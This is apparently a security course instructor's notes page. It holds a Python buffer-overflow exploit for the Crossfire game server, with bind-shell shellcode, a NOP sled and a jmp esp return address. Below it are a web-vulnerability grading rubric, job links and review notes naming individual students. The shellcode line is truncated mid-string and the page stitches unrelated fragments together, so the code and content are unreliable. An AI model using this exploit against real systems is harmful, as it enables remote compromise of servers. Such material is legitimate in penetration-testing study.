VAPT

Crossfire

  • https://www.doyler.net/security-not-included/crossfire-buffer-overflow-linux-exploit
import socket, sys

host = "127.0.0.1"
offset = 4368
crash = 4394

buf = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04>

overflow = b"\x90" * 32
overflow += buf
overflow += b"\x90" * (offset - len(overflow))
overflow += b"\x97\x45\x13\x08" # jmp esp
overflow += b"\x83\xc0\x0c" # add 12 to eax
overflow += b"\xff\xe0" # jmp eax
overflow += b"\x90" * (crash - len(overflow))

buffer = b"\x11(setup sound " + overflow + b"\x90\x00#"

s = socket.socket()

print("[*] Sending exploit...\n")
s.connect((host, 13327))
data = s.recv(1024)
print(data)
s.send(buffer)
s.close()

print("[!] Payload sent!")

8.54 * 2 3.07 1.48

[-5] Q9.d Wrong target (all subquestions in Q9 refer to Indeed)

  • https://myturn.careers/jobs/
  • https://us.jobtome.com/jobs?keyword=cybersecurity&radius=25&sort=date

command injection: 5 points
command injection (medium): 10 points
sql injection: 15 points
reflected XSS: 15 points
stored XSS + CSRF + description of steps taken to craft, test, and exploit: 40 points (-20 points if they don't provide correct details on the steps they took)
iframe: 15 points

Review

1. Sm Shihubullah Dipto - Q6 Missing iframe tag - Used JavaScript payload (PoC screenshot not submitted)
2. Elliot Tuchscherer - Late submission by 6 days
3. Gagan Yalamuri - Q6 Missing iframe tag - But used <script> payload
4. Lychtenstein Zhang - Q6 Missing iframe tag - But used <script> payload